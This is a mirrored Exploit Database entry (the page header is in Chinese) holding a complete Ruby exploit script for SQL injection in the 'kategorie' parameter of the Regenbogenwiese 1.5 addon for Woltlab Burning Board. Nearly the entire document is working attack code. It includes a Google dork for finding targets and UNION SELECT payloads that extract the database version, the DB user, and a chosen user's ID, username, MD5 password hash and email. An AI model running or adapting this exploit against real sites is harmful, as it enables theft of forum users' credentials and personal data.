Woltlab Burning Board Regenbogenwiese 2007 Addon – SQL Injection

• Exploit Database
• 112 阅读

• 作者： Easy Laster
  日期： 2013-10-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/29023/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102

  # Exploit Title: Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection Exploit # Google Dork: inurl:regenbogenwiese.php wbb (and more) # Date: 04.09.2013 # Exploit Author: Easy Laster # Software Name: Regenbogenwiese v1.5 © 2007 by DieKrabbe # Version: 1.5 # Tested on: Windows 8/Backtrack #   #!/usr/bin/ruby #secunet.cc #30.07.2013 #regenbogenwiese.php?kategorie='+union+select #+1,1,1,1,1,1,concat(database(),0x3a,user(),0x #3a,userid,0x3a,password,0x3a,username,0x3a,em #ail),1,1,1,1,1,1,1,1+bb1_users+where+userid=1--+ #Discovered and Vulnerability by Easy Laster print " ################################################################ #secunet.cc# ################################################################ #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# #Woltlab Burning Board Regenbogenwiese 2007 Addon SQL Injection# # (regenbogenwiese.php, kategorie param) # #Exploit # # Using Host+Path+id # #www.demo.de + /wbb/ + or + / + 1# # Easy Laster# #PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT!PRIVAT# ################################################################ " require 'net/http' block = "################################################################" print ""+ block +"" print "\nEnter Target Name (site.com)->" host=gets.chomp print ""+ block +"" print "\nEnter Script Path (/wbb/ or /)->" path=gets.chomp print ""+ block +"" print "\nEnter The ID From User (id)->" userid=gets.chomp print ""+ block +"" begin dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat(0x27,0x7e,"+ "0x27,version(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+where+userid="+ ""+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nVersion Database -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,user(),0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users"+ "+where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nDatabase User-> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,userid,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+wh"+ "ere+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nID Account-> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,username,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nUsername Account -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,concat"+ "(0x27,0x7e,0x27,password,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+w"+ "here+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nPassword Account MD5 -> "+(/'~'(.+)'~'/).match(resp.body)[1]   dir ="regenbogenwiese.php?kategorie=%27+union+select+1,1,1,1,1,1,conc"+ "at(0x27,0x7e,0x27,email,0x27,0x7e,0x27),1,1,1,1,1,1,1,1+from+bb1_users+"+ "where+userid="+ userid +"--+" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nEmail Adresse Account -> "+(/'~'(.+)'~'/).match(resp.body)[1] print "\n" print ""+ block +"" print "\n" print " ################################################################ #Greetings # ################################################################ -#------------------------+ | |#---------------------+ -#------------------------+_|_|_ #---------------------+ -#------------------------+(o o) #---------------------+ -#------------------------+ooO--(_)--Ooo-#---------------------+ ################################################################ " rescue print "\nExploit Failed" end